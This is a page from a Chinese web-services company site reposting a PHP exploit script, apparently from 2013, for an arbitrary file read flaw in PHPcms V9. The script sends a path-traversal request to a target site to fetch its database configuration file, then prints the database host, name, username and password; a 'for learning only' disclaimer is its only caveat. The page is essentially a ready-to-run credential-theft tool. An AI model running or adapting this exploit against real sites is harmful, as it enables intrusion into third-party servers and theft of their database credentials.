文章中心

+ 新闻中心

+ 网站建设

+ 网页设计

+ 平面动画

+ 网站开发

+ 数据库开发

+ 安全维护

+ 网站安全

+ 软件开发

首页 > 行业资讯 > 数据库安全>详细内容

phpcms v9 任意文件读取漏洞exp

添加时间：2013-12-7

相关阅读: 程序 PHP

<?php

/**

* PHPcms V9 任意文件读取漏洞检测工具

* @author Return Blog: www.creturn.com

* Email: master@creturn.com

* 注意本程序仅供学习参考，不得用于非法互动

* 否则后果自负，与本人无关！

function showInfo() {

print '

***********************************************

* PHPcmsV9 Read All File ExpTool By: Return

* Blog: www.creturn.com

* Email:master@creturn.com

* Example: php exp.php wwww.phpcms.cn

***********************************************

}

$exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php';

//file_get_contents(''.$exp);

if(count($argv) < 2){

showInfo();

}else{

$exp = 'http://'.$argv[1].$exp;

$data = @file_get_contents($exp);

@file_put_contents('expDatabase.php', $data);

if(strstr($data,'<html>')){

showInfo();

echo 'Not found !';

exit();

};

$database = include 'expDatabase.php';

showInfo();

$out = 'HostName: '.$database['default']['hostname']."\n";

$out .='DataBase:'. $database['default']['database']."\n";

$out .='UserName:'. $database['default']['username']."\n";

$out .='Password:'. $database['default']['password']."\n";

if(!empty($database)){

echo "Found it! :\n\n";

echo $out;

}

@unlink('expDatabase.php');

}

相关phpcms v9 任意文件读取漏洞exp

关于数据库安全的五点思考 [2013-12-7]

数据库系统防黑客入侵技术综述 [2013-12-7]

解决MySQL中出现的文乱码问题 [2013-12-7]

如何解决MySQL连接超时关闭 [2013-12-7]

十大关系数据库SQL注入工具一览 [2013-12-7]

SQL高级利用之使用带外通道 [2013-12-7]

咨询热线：020-85648757 85648755 85648616 0755-27912581 客服：020-85648756 0755-27912581 业务传真：020-32579052
广州市网景网络科技有限公司 Copyright◎2003-2008 Veelink.com. All Rights Reserved.
广州商务地址：广东省广州市黄埔大道中203号(海景园区)海景花园C栋501室
= 深圳商务地址：深圳市宝源路华丰宝源大厦606
研发中心：广东广州市天河软件园海景园区粤ICP备05103322号工商注册